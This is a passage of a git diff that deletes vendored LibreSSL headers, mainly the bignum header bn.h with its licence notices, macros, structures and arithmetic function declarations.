-const char *BF_options(void);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/bn.h b/thirdparty/libressl/include/openssl/bn.h
deleted file mode 100644
index 0dde08a..0000000
--- a/thirdparty/libressl/include/openssl/bn.h
+++ /dev/null
@@ -1,714 +0,0 @@
-/* $OpenBSD: bn.h,v 1.36 2017/01/25 06:15:44 beck Exp $ */
-/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-/* ====================================================================
- * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-/* ====================================================================
- * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
- *
- * Portions of the attached software ("Contribution") are developed by
- * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
- *
- * The Contribution is licensed pursuant to the Eric Young open source
- * license provided above.
- *
- * The binary polynomial arithmetic software is originally written by
- * Sheueling Chang Shantz and Douglas Stebila of Sun Microsystems Laboratories.
- *
- */
-
-#ifndef HEADER_BN_H
-#define HEADER_BN_H
-
-#include <stdio.h>
-#include <stdlib.h>
-
-#include <openssl/opensslconf.h>
-
-#include <openssl/ossl_typ.h>
-#include <openssl/crypto.h>
-#include <openssl/bio.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* These preprocessor symbols control various aspects of the bignum headers and
- * library code. They're not defined by any "normal" configuration, as they are
- * intended for development and testing purposes. NB: defining all three can be
- * useful for debugging application code as well as openssl itself.
- *
- * BN_DEBUG - turn on various debugging alterations to the bignum code
- * BN_DEBUG_RAND - uses random poisoning of unused words to trip up
- * mismanagement of bignum internals. You must also define BN_DEBUG.
- */
-/* #define BN_DEBUG */
-/* #define BN_DEBUG_RAND */
-
-#ifndef OPENSSL_SMALL_FOOTPRINT
-#define BN_MUL_COMBA
-#define BN_SQR_COMBA
-#define BN_RECURSION
-#endif
-
-/* This next option uses the C libraries (2 word)/(1 word) function.
- * If it is not defined, I use my C version (which is slower).
- * The reason for this flag is that when the particular C compiler
- * library routine is used, and the library is linked with a different
- * compiler, the library is missing.  This mostly happens when the
- * library is built with gcc and then linked using normal cc.  This would
- * be a common occurrence because gcc normally produces code that is
- * 2 times faster than system compilers for the big number stuff.
- * For machines with only one compiler (or shared libraries), this should
- * be on.  Again this in only really a problem on machines
- * using "long long's", are 32bit, and are not using my assembler code. */
-/* #define BN_DIV2W */
-
-#ifdef _LP64
-#undef	BN_LLONG
-#define BN_ULONG	unsigned long
-#define BN_LONG		long
-#define BN_BITS		128
-#define BN_BYTES	8
-#define BN_BITS2	64
-#define BN_BITS4	32
-#define BN_MASK2	(0xffffffffffffffffL)
-#define BN_MASK2l	(0xffffffffL)
-#define BN_MASK2h	(0xffffffff00000000L)
-#define BN_MASK2h1	(0xffffffff80000000L)
-#define BN_TBIT		(0x8000000000000000L)
-#define BN_DEC_CONV	(10000000000000000000UL)
-#define BN_DEC_FMT1	"%lu"
-#define BN_DEC_FMT2	"%019lu"
-#define BN_DEC_NUM	19
-#define BN_HEX_FMT1	"%lX"
-#define BN_HEX_FMT2	"%016lX"
-#else
-#define BN_ULLONG	unsigned long long
-#define	BN_LLONG
-#define BN_ULONG	unsigned int
-#define BN_LONG		int
-#define BN_BITS		64
-#define BN_BYTES	4
-#define BN_BITS2	32
-#define BN_BITS4	16
-#define BN_MASK		(0xffffffffffffffffLL)
-#define BN_MASK2	(0xffffffffL)
-#define BN_MASK2l	(0xffff)
-#define BN_MASK2h1	(0xffff8000L)
-#define BN_MASK2h	(0xffff0000L)
-#define BN_TBIT		(0x80000000L)
-#define BN_DEC_CONV	(1000000000L)
-#define BN_DEC_FMT1	"%u"
-#define BN_DEC_FMT2	"%09u"
-#define BN_DEC_NUM	9
-#define BN_HEX_FMT1	"%X"
-#define BN_HEX_FMT2	"%08X"
-#endif
-
-#define BN_FLG_MALLOCED		0x01
-#define BN_FLG_STATIC_DATA	0x02
-#define BN_FLG_CONSTTIME	0x04 /* avoid leaking exponent information through timing,
-                                      * BN_mod_exp_mont() will call BN_mod_exp_mont_consttime,
-                                      * BN_div() will call BN_div_no_branch,
-                                      * BN_mod_inverse() will call BN_mod_inverse_no_branch.
-                                      */
-
-#ifndef OPENSSL_NO_DEPRECATED
-#define BN_FLG_EXP_CONSTTIME BN_FLG_CONSTTIME /* deprecated name for the flag */
-                                      /* avoid leaking exponent information through timings
-                                      * (BN_mod_exp_mont() will call BN_mod_exp_mont_consttime) */
-#endif
-
-#ifndef OPENSSL_NO_DEPRECATED
-#define BN_FLG_FREE		0x8000	/* used for debuging */
-#endif
-#define BN_set_flags(b,n)	((b)->flags|=(n))
-#define BN_get_flags(b,n)	((b)->flags&(n))
-
-/* get a clone of a BIGNUM with changed flags, for *temporary* use only
- * (the two BIGNUMs cannot not be used in parallel!) */
-#define BN_with_flags(dest,b,n)  ((dest)->d=(b)->d, \
-                                  (dest)->top=(b)->top, \
-                                  (dest)->dmax=(b)->dmax, \
-                                  (dest)->neg=(b)->neg, \
-                                  (dest)->flags=(((dest)->flags & BN_FLG_MALLOCED) \
-                                                 |  ((b)->flags & ~BN_FLG_MALLOCED) \
-                                                 |  BN_FLG_STATIC_DATA \
-                                                 |  (n)))
-
-struct bignum_st {
-	BN_ULONG *d;	/* Pointer to an array of 'BN_BITS2' bit chunks. */
-	int top;	/* Index of last used d +1. */
-	/* The next are internal book keeping for bn_expand. */
-	int dmax;	/* Size of the d array. */
-	int neg;	/* one if the number is negative */
-	int flags;
-};
-
-/* Used for montgomery multiplication */
-struct bn_mont_ctx_st {
-	int ri;        /* number of bits in R */
-	BIGNUM RR;     /* used to convert to montgomery form */
-	BIGNUM N;      /* The modulus */
-	BIGNUM Ni;     /* R*(1/R mod N) - N*Ni = 1
-	                * (Ni is only stored for bignum algorithm) */
-	BN_ULONG n0[2];/* least significant word(s) of Ni;
-	                  (type changed with 0.9.9, was "BN_ULONG n0;" before) */
-	int flags;
-};
-
-/* Used for reciprocal division/mod functions
- * It cannot be shared between threads
- */
-struct bn_recp_ctx_st {
-	BIGNUM N;	/* the divisor */
-	BIGNUM Nr;	/* the reciprocal */
-	int num_bits;
-	int shift;
-	int flags;
-};
-
-/* Used for slow "generation" functions. */
-struct bn_gencb_st {
-	unsigned int ver;	/* To handle binary (in)compatibility */
-	void *arg;		/* callback-specific data */
-	union {
-		/* if(ver==1) - handles old style callbacks */
-		void (*cb_1)(int, int, void *);
-		/* if(ver==2) - new callback style */
-		int (*cb_2)(int, int, BN_GENCB *);
-	} cb;
-};
-/* Wrapper function to make using BN_GENCB easier,  */
-int BN_GENCB_call(BN_GENCB *cb, int a, int b);
-/* Macro to populate a BN_GENCB structure with an "old"-style callback */
-#define BN_GENCB_set_old(gencb, callback, cb_arg) { \
-		BN_GENCB *tmp_gencb = (gencb); \
-		tmp_gencb->ver = 1; \
-		tmp_gencb->arg = (cb_arg); \
-		tmp_gencb->cb.cb_1 = (callback); }
-/* Macro to populate a BN_GENCB structure with a "new"-style callback */
-#define BN_GENCB_set(gencb, callback, cb_arg) { \
-		BN_GENCB *tmp_gencb = (gencb); \
-		tmp_gencb->ver = 2; \
-		tmp_gencb->arg = (cb_arg); \
-		tmp_gencb->cb.cb_2 = (callback); }
-
-#define BN_prime_checks 0 /* default: select number of iterations
-			     based on the size of the number */
-
-/* number of Miller-Rabin iterations for an error rate  of less than 2^-80
- * for random 'b'-bit input, b >= 100 (taken from table 4.4 in the Handbook
- * of Applied Cryptography [Menezes, van Oorschot, Vanstone; CRC Press 1996];
- * original paper: Damgaard, Landrock, Pomerance: Average case error estimates
- * for the strong probable prime test. -- Math. Comp. 61 (1993) 177-194) */
-#define BN_prime_checks_for_size(b) ((b) >= 1300 ?  2 : \
-                                (b) >=  850 ?  3 : \
-                                (b) >=  650 ?  4 : \
-                                (b) >=  550 ?  5 : \
-                                (b) >=  450 ?  6 : \
-                                (b) >=  400 ?  7 : \
-                                (b) >=  350 ?  8 : \
-                                (b) >=  300 ?  9 : \
-                                (b) >=  250 ? 12 : \
-                                (b) >=  200 ? 15 : \
-                                (b) >=  150 ? 18 : \
-                                /* b >= 100 */ 27)
-
-#define BN_num_bytes(a)	((BN_num_bits(a)+7)/8)
-
-/* Note that BN_abs_is_word didn't work reliably for w == 0 until 0.9.8 */
-#define BN_abs_is_word(a,w) ((((a)->top == 1) && ((a)->d[0] == (BN_ULONG)(w))) || \
-				(((w) == 0) && ((a)->top == 0)))
-#define BN_is_zero(a)       ((a)->top == 0)
-#define BN_is_one(a)        (BN_abs_is_word((a),1) && !(a)->neg)
-#define BN_is_word(a,w)     (BN_abs_is_word((a),(w)) && (!(w) || !(a)->neg))
-#define BN_is_odd(a)	    (((a)->top > 0) && ((a)->d[0] & 1))
-
-#define BN_one(a)	(BN_set_word((a),1))
-#define BN_zero_ex(a) \
-	do { \
-		BIGNUM *_tmp_bn = (a); \
-		_tmp_bn->top = 0; \
-		_tmp_bn->neg = 0; \
-	} while(0)
-
-#ifdef OPENSSL_NO_DEPRECATED
-#define BN_zero(a)	BN_zero_ex(a)
-#else
-#define BN_zero(a)	(BN_set_word((a),0))
-#endif
-
-const BIGNUM *BN_value_one(void);
-char *	BN_options(void);
-BN_CTX *BN_CTX_new(void);
-#ifndef OPENSSL_NO_DEPRECATED
-void	BN_CTX_init(BN_CTX *c);
-#endif
-void	BN_CTX_free(BN_CTX *c);
-void	BN_CTX_start(BN_CTX *ctx);
-BIGNUM *BN_CTX_get(BN_CTX *ctx);
-void	BN_CTX_end(BN_CTX *ctx);
-int     BN_rand(BIGNUM *rnd, int bits, int top, int bottom);
-int     BN_pseudo_rand(BIGNUM *rnd, int bits, int top, int bottom);
-int	BN_rand_range(BIGNUM *rnd, const BIGNUM *range);
-int	BN_pseudo_rand_range(BIGNUM *rnd, const BIGNUM *range);
-int	BN_num_bits(const BIGNUM *a);
-int	BN_num_bits_word(BN_ULONG);
-BIGNUM *BN_new(void);
-void	BN_init(BIGNUM *);
-void	BN_clear_free(BIGNUM *a);
-BIGNUM *BN_copy(BIGNUM *a, const BIGNUM *b);
-void	BN_swap(BIGNUM *a, BIGNUM *b);
-BIGNUM *BN_bin2bn(const unsigned char *s, int len, BIGNUM *ret);
-int	BN_bn2bin(const BIGNUM *a, unsigned char *to);
-BIGNUM *BN_mpi2bn(const unsigned char *s, int len, BIGNUM *ret);
-int	BN_bn2mpi(const BIGNUM *a, unsigned char *to);
-int	BN_sub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b);
-int	BN_usub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b);
-int	BN_uadd(BIGNUM *r, const BIGNUM *a, const BIGNUM *b);
-int	BN_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b);
-int	BN_mul(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
-int	BN_sqr(BIGNUM *r, const BIGNUM *a, BN_CTX *ctx);
-/** BN_set_negative sets sign of a BIGNUM
- * \param  b  pointer to the BIGNUM object
- * \param  n  0 if the BIGNUM b should be positive and a value != 0 otherwise
- */
-void	BN_set_negative(BIGNUM *b, int n);
-/** BN_is_negative returns 1 if the BIGNUM is negative
- * \param  a  pointer to the BIGNUM object
- * \return 1 if a < 0 and 0 otherwise
- */
-#define BN_is_negative(a) ((a)->neg != 0)
-
-#ifndef LIBRESSL_INTERNAL
-int	BN_div(BIGNUM *dv, BIGNUM *rem, const BIGNUM *m, const BIGNUM *d,
-    BN_CTX *ctx);
-#define BN_mod(rem,m,d,ctx) BN_div(NULL,(rem),(m),(d),(ctx))
-#endif
-int	BN_nnmod(BIGNUM *r, const BIGNUM *m, const BIGNUM *d, BN_CTX *ctx);
-int	BN_mod_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m, BN_CTX *ctx);
-int	BN_mod_add_quick(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m);
-int	BN_mod_sub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m, BN_CTX *ctx);
-int	BN_mod_sub_quick(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m);
-int	BN_mod_mul(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
-    const BIGNUM *m, BN_CTX *ctx);
-int	BN_mod_sqr(BIGNUM *r, const BIGNUM *a, const BIGNUM *m, BN_CTX *ctx);
-int	BN_mod_lshift1(BIGNUM *r, const BIGNUM *a, const BIGNUM *m, BN_CTX *ctx);
-int	BN_mod_lshift1_quick(BIGNUM *r, const BIGNUM *a, const BIGNUM *m);
-int	BN_mod_lshift(BIGNUM *r, const BIGNUM *a, int n, const BIGNUM *m, BN_CTX *ctx);
-int	BN_mod_lshift_quick(BIGNUM *r, const BIGNUM *a, int n, const BIGNUM *m);
-
-BN_ULONG BN_mod_word(const BIGNUM *a, BN_ULONG w);
-BN_ULONG BN_div_word(BIGNUM *a, BN_ULONG w);
-int	BN_mul_word(BIGNUM *a, BN_ULONG w);
-int	BN_add_word(BIGNUM *a, BN_ULONG w);
-int	BN_sub_word(BIGNUM *a, BN_ULONG w);
-int	BN_set_word(BIGNUM *a, BN_ULONG w);
-BN_ULONG BN_get_word(const BIGNUM *a);
-
-int	BN_cmp(const BIGNUM *a, const BIGNUM *b);
-void	BN_free(BIGNUM *a);
-int	BN_is_bit_set(const BIGNUM *a, int n);
-int	BN_lshift(BIGNUM *r, const BIGNUM *a, int n);
-int	BN_lshift1(BIGNUM *r, const BIGNUM *a);
-int	BN_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
-
-#ifndef LIBRESSL_INTERNAL
-int	BN_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
-    const BIGNUM *m, BN_CTX *ctx);
-int	BN_mod_exp_mont(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
-    const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx);
-#endif
-int BN_mod_exp_mont_consttime(BIGNUM *rr, const BIGNUM *a, const BIGNUM *p,
-    const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *in_mont);
-int	BN_mod_exp_mont_word(BIGNUM *r, BN_ULONG a, const BIGNUM *p,
-    const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx);
-int	BN_mod_exp2_mont(BIGNUM *r, const BIGNUM *a1, const BIGNUM *p1,
-    const BIGNUM *a2, const BIGNUM *p2, const BIGNUM *m,
-    BN_CTX *ctx, BN_MONT_CTX *m_ctx);
-int	BN_mod_exp_simple(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
-    const BIGNUM *m, BN_CTX *ctx);
-
-int	BN_mask_bits(BIGNUM *a, int n);
-int	BN_print_fp(FILE *fp, const BIGNUM *a);
-int	BN_print(BIO *fp, const BIGNUM *a);
-int	BN_reciprocal(BIGNUM *r, const BIGNUM *m, int len, BN_CTX *ctx);
-int	BN_rshift(BIGNUM *r, const BIGNUM *a, int n);
-int	BN_rshift1(BIGNUM *r, const BIGNUM *a);
-void	BN_clear(BIGNUM *a);
-BIGNUM *BN_dup(const BIGNUM *a);
-int	BN_ucmp(const BIGNUM *a, const BIGNUM *b);
-int	BN_set_bit(BIGNUM *a, int n);
-int	BN_clear_bit(BIGNUM *a, int n);
-char *	BN_bn2hex(const BIGNUM *a);
-char *	BN_bn2dec(const BIGNUM *a);
-int 	BN_hex2bn(BIGNUM **a, const char *str);
-int 	BN_dec2bn(BIGNUM **a, const char *str);
-int	BN_asc2bn(BIGNUM **a, const char *str);
-#ifndef LIBRESSL_INTERNAL
-int	BN_gcd(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
-#endif
-int	BN_kronecker(const BIGNUM *a,const BIGNUM *b,BN_CTX *ctx); /* returns -2 for error */
-#ifndef LIBRESSL_INTERNAL
-BIGNUM *BN_mod_inverse(BIGNUM *ret,
-    const BIGNUM *a, const BIGNUM *n, BN_CTX *ctx);
-#endif
-BIGNUM *BN_mod_sqrt(BIGNUM *ret,
-    const BIGNUM *a, const BIGNUM *n, BN_CTX *ctx);
-
-void	BN_consttime_swap(BN_ULONG swap, BIGNUM *a, BIGNUM *b, int nwords);
-
-/* Deprecated versions */
-#ifndef OPENSSL_NO_DEPRECATED
-BIGNUM *BN_generate_prime(BIGNUM *ret, int bits, int safe,
-    const BIGNUM *add, const BIGNUM *rem,
-    void (*callback)(int, int, void *), void *cb_arg);
-int	BN_is_prime(const BIGNUM *p, int nchecks,
-    void (*callback)(int, int, void *),
-    BN_CTX *ctx, void *cb_arg);
-int	BN_is_prime_fasttest(const BIGNUM *p, int nchecks,
-    void (*callback)(int, int, void *), BN_CTX *ctx, void *cb_arg,
-    int do_trial_division);
-#endif /* !defined(OPENSSL_NO_DEPRECATED) */
-
-/* Newer versions */
-int	BN_generate_prime_ex(BIGNUM *ret, int bits, int safe, const BIGNUM *add,
-    const BIGNUM *rem, BN_GENCB *cb);
-int	BN_is_prime_ex(const BIGNUM *p, int nchecks, BN_CTX *ctx, BN_GENCB *cb);
-int	BN_is_prime_fasttest_ex(const BIGNUM *p, int nchecks, BN_CTX *ctx,
-    int do_trial_division, BN_GENCB *cb);
-
-int BN_X931_generate_Xpq(BIGNUM *Xp, BIGNUM *Xq, int nbits, BN_CTX *ctx);
-
-int BN_X931_derive_prime_ex(BIGNUM *p, BIGNUM *p1, BIGNUM *p2,
-    const BIGNUM *Xp, const BIGNUM *Xp1, const BIGNUM *Xp2,
-    const BIGNUM *e, BN_CTX *ctx, BN_GENCB *cb);
-int BN_X931_generate_prime_ex(BIGNUM *p, BIGNUM *p1, BIGNUM *p2,
-    BIGNUM *Xp1, BIGNUM *Xp2,
-    const BIGNUM *Xp,
-    const BIGNUM *e, BN_CTX *ctx,
-    BN_GENCB *cb);
-
-BN_MONT_CTX *BN_MONT_CTX_new(void );
-void BN_MONT_CTX_init(BN_MONT_CTX *ctx);
-int BN_mod_mul_montgomery(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
-    BN_MONT_CTX *mont, BN_CTX *ctx);
-#define BN_to_montgomery(r,a,mont,ctx)	BN_mod_mul_montgomery(\
-	(r),(a),&((mont)->RR),(mont),(ctx))
-int BN_from_montgomery(BIGNUM *r, const BIGNUM *a,
-    BN_MONT_CTX *mont, BN_CTX *ctx);
-void BN_MONT_CTX_free(BN_MONT_CTX *mont);
-int BN_MONT_CTX_set(BN_MONT_CTX *mont, const BIGNUM *mod, BN_CTX *ctx);
-BN_MONT_CTX *BN_MONT_CTX_copy(BN_MONT_CTX *to, BN_MONT_CTX *from);
-BN_MONT_CTX *BN_MONT_CTX_set_locked(BN_MONT_CTX **pmont, int lock,
-    const BIGNUM *mod, BN_CTX *ctx);
-
-/* BN_BLINDING flags */
-#define	BN_BLINDING_NO_UPDATE	0x00000001
-#define	BN_BLINDING_NO_RECREATE	0x00000002
-
-BN_BLINDING *BN_BLINDING_new(const BIGNUM *A, const BIGNUM *Ai, BIGNUM *mod);
-void BN_BLINDING_free(BN_BLINDING *b);
-int BN_BLINDING_update(BN_BLINDING *b, BN_CTX *ctx);
-int BN_BLINDING_convert(BIGNUM *n, BN_BLINDING *b, BN_CTX *ctx);
-int BN_BLINDING_invert(BIGNUM *n, BN_BLINDING *b, BN_CTX *ctx);
-int BN_BLINDING_convert_ex(BIGNUM *n, BIGNUM *r, BN_BLINDING *b, BN_CTX *);
-int BN_BLINDING_invert_ex(BIGNUM *n, const BIGNUM *r, BN_BLINDING *b, BN_CTX *);
-#ifndef OPENSSL_NO_DEPRECATED
-unsigned long BN_BLINDING_get_thread_id(const BN_BLINDING *);
-void BN_BLINDING_set_thread_id(BN_BLINDING *, unsigned long);
-#endif
-CRYPTO_THREADID *BN_BLINDING_thread_id(BN_BLINDING *);
-unsigned long BN_BLINDING_get_flags(const BN_BLINDING *);
-void BN_BLINDING_set_flags(BN_BLINDING *, unsigned long);
-BN_BLINDING *BN_BLINDING_create_param(BN_BLINDING *b,
-    const BIGNUM *e, BIGNUM *m, BN_CTX *ctx,
-    int (*bn_mod_exp)(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
-    const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx),
-    BN_MONT_CTX *m_ctx);
-
-#ifndef OPENSSL_NO_DEPRECATED
-void BN_set_params(int mul, int high, int low, int mont);
-int BN_get_params(int which); /* 0, mul, 1 high, 2 low, 3 mont */
-#endif
-
-void	BN_RECP_CTX_init(BN_RECP_CTX *recp);
-BN_RECP_CTX *BN_RECP_CTX_new(void);
-void	BN_RECP_CTX_free(BN_RECP_CTX *recp);
-int	BN_RECP_CTX_set(BN_RECP_CTX *recp, const BIGNUM *rdiv, BN_CTX *ctx);
-int	BN_mod_mul_reciprocal(BIGNUM *r, const BIGNUM *x, const BIGNUM *y,
-    BN_RECP_CTX *recp, BN_CTX *ctx);
-int	BN_mod_exp_recp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
-    const BIGNUM *m, BN_CTX *ctx);
-int	BN_div_recp(BIGNUM *dv, BIGNUM *rem, const BIGNUM *m,
-    BN_RECP_CTX *recp, BN_CTX *ctx);
-
-#ifndef OPENSSL_NO_EC2M
-
-/* Functions for arithmetic over binary polynomials represented by BIGNUMs.
- *
- * The BIGNUM::neg property of BIGNUMs representing binary polynomials is
- * ignored.
- *
- * Note that input arguments are not const so that their bit arrays can
- * be expanded to the appropriate size if needed.
- */
-
-int	BN_GF2m_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b); /*r = a + b*/
-#define BN_GF2m_sub(r, a, b) BN_GF2m_add(r, a, b)
-int	BN_GF2m_mod(BIGNUM *r, const BIGNUM *a, const BIGNUM *p); /*r=a mod p*/
-int
-BN_GF2m_mod_mul(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
-	const BIGNUM *p, BN_CTX *ctx); /* r = (a * b) mod p */
-int
-BN_GF2m_mod_sqr(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
-	BN_CTX *ctx); /* r = (a * a) mod p */
-int
-BN_GF2m_mod_inv(BIGNUM *r, const BIGNUM *b, const BIGNUM *p,
-	BN_CTX *ctx); /* r = (1 / b) mod p */
-int
-BN_GF2m_mod_div(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
-	const BIGNUM *p, BN_CTX *ctx); /* r = (a / b) mod p */
-int
-BN_GF2m_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
-	const BIGNUM *p, BN_CTX *ctx); /* r = (a ^ b) mod p */
-int
-BN_GF2m_mod_sqrt(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
-	BN_CTX *ctx); /* r = sqrt(a) mod p */
-int	BN_GF2m_mod_solve_quad(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
-	BN_CTX *ctx); /* r^2 + r = a mod p */
-#define BN_GF2m_cmp(a, b) BN_ucmp((a), (b))
-/* Some functions allow for representation of the irreducible polynomials
- * as an unsigned int[], say p.  The irreducible f(t) is then of the form:
- *     t^p[0] + t^p[1] + ... + t^p[k]
- * where m = p[0] > p[1] > ... > p[k] = 0.
- */
-int	BN_GF2m_mod_arr(BIGNUM *r, const BIGNUM *a, const int p[]);
-/* r = a mod p */
-int BN_GF2m_mod_mul_arr(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
-	const int p[], BN_CTX *ctx); /* r = (a * b) mod p */
-int BN_GF2m_mod_sqr_arr(BIGNUM *r, const BIGNUM *a, const int p[],
-	BN_CTX *ctx); /* r = (a * a) mod p */
-int BN_GF2m_mod_inv_arr(BIGNUM *r, const BIGNUM *b, const int p[],
-	BN_CTX *ctx); /* r = (1 / b) mod p */
-int	BN_GF2m_mod_div_arr(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
-	const int p[], BN_CTX *ctx); /* r = (a / b) mod p */
-int	BN_GF2m_mod_exp_arr(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
-	const int p[], BN_CTX *ctx); /* r = (a ^ b) mod p */
-int	BN_GF2m_mod_sqrt_arr(BIGNUM *r, const BIGNUM *a,
-	const int p[], BN_CTX *ctx); /* r = sqrt(a) mod p */
-int	BN_GF2m_mod_solve_quad_arr(BIGNUM *r, const BIGNUM *a,
-	const int p[], BN_CTX *ctx); /* r^2 + r = a mod p */
-int	BN_GF2m_poly2arr(const BIGNUM *a, int p[], int max);
-int	BN_GF2m_arr2poly(const int p[], BIGNUM *a);
-
-#endif
-
-/* faster mod functions for the 'NIST primes'
- * 0 <= a < p^2 */
-int BN_nist_mod_192(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
-int BN_nist_mod_224(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
